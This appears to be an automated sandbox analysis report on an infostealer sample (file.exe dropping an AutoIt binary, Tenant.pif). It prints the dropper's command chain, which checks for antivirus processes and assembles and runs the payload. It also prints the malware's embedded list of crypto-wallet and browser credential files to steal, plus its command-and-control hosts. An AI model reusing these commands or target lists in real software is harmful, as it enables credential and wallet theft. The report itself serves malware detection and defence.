                    Source: C:\Windows\SysWOW64\tasklist.exe - Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00ACA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00ACA385
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00ACA354 SetUnhandledExceptionFilter,11_2_00ACA354

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match - File source: Process Memory Space: Tenant.pif PID: 2260, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AF9369 LogonUserW,11_2_00AF9369
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AB5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00AB5240
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B01AC6 SendInput,keybd_event,11_2_00B01AC6
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B051E2 mouse_event,11_2_00B051E2
                    Source: C:\Users\user\Desktop\file.exe - Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit
                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 271973
                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "NorwegianLivedJerseyRelaxation" Para
                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Ventures + ..\Thousands + ..\Enhance + ..\Kept + ..\Everything + ..\Say C
                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Tenant.pif C
                    Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AF88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AF88CD
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B04F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00B04F1C
                    Source: file.exe, 00000000.00000003.2009804495.00000000028C3000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp, Tenant.pif.2.dr, Neo.0.dr - Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Tenant.pif - Binary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AC885B cpuid 11_2_00AC885B
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AE0030 GetLocalTime,__swprintf,11_2_00AE0030
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AE0722 GetUserNameW,11_2_00AE0722
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AD416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00AD416A
                    Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                    Source: Amcache.hve.17.dr - Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.17.dr - Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.17.dr - Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001479000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: Amcache.hve.17.dr - Binary or memory string: MsMpEng.exe
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match - File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match - File source: 11.2.Tenant.pif.150000.0.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 11.2.Tenant.pif.13e3318.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 11.2.Tenant.pif.13e3318.3.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: Process Memory Space: Tenant.pif PID: 2260, type: MEMORYSTR
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp - String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Binance\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif; File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                    Source: Tenant.pif; Binary or memory string: WIN_81
                    Source: Tenant.pif; Binary or memory string: WIN_XP
                    Source: Tenant.pif; Binary or memory string: WIN_XPe
                    Source: Tenant.pif; Binary or memory string: WIN_VISTA
                    Source: Tenant.pif; Binary or memory string: WIN_7
                    Source: Tenant.pif; Binary or memory string: WIN_8
                    Source: Neo.0.dr; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara match; File source: Process Memory Space: Tenant.pif PID: 2260, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 11.2.Tenant.pif.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Tenant.pif.13e3318.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Tenant.pif.13e3318.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Tenant.pif PID: 2260, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Code function: 11_2_00B1696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Code function: 11_2_00B16E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (one technique per tactic column; a leading number is the count shown with that technique in the report)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 11 Windows Management Instrumentation | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 27 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 111 Masquerading | LSA Secrets | 61 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Valid Accounts | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph (ID: 1501386; Sample: file.exe; Startdate: 29/08/2024; Architecture: WINDOWS; Score: 100)

Top-level DNS/IP nodes: steamcommunity.com; stadiatechnologies.com; gCmUfnfZJOKMjo.gCmUfnfZJOKMjo
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures

file.exe 19 started
  Signature: Found stalling execution ending in API Sleep call
  -> cmd.exe 2 started
     Dropped: C:\Users\user\AppData\Local\...\Tenant.pif, PE32
     Signature: Drops PE files with a suspicious file extension
     -> Tenant.pif 176 started
        DNS/IP: stadiatechnologies.com 95.164.119.162, 59961, 80 (VAKPoltavaUkraineUA, Gibraltar); 94.130.188.148, 443, 59938, 59939 (HETZNER-ASDE, Germany); steamcommunity.com 23.197.127.21, 443, 59937 (AKAMAI-ASN1EU, United States)
        Dropped: C:\ProgramData\vcruntime140.dll, PE32; C:\ProgramData\softokn3.dll, PE32; C:\ProgramData\nss3.dll, PE32; 3 other files (none is malicious)
        Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
        -> WerFault.exe 16 started
     -> cmd.exe 2 started
     -> conhost.exe started
     -> 7 other processes started

Source | Detection | Scanner | Label
file.exe | 11% | ReversingLabs |
file.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\ProgramData\freebl3.dll | 0% | ReversingLabs |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs |
C:\ProgramData\nss3.dll | 0% | ReversingLabs |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | 5% | ReversingLabs |
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | URL Reputation | safe
https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | URL Reputation | safe
http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | 0% | URL Reputation | safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=en | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | 0% | URL Reputation | safe
https://mozilla.org0/ | 0% | URL Reputation | safe
http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | URL Reputation | safe
https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | 0% | URL Reputation | safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | 0% | URL Reputation | safe
https://store.steampowered.com/about/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&a | 0% | URL Reputation | safe
https://help.steampowered.com/en/ | 0% | URL Reputation | safe
https://store.steampowered.com/news/ | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
https://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
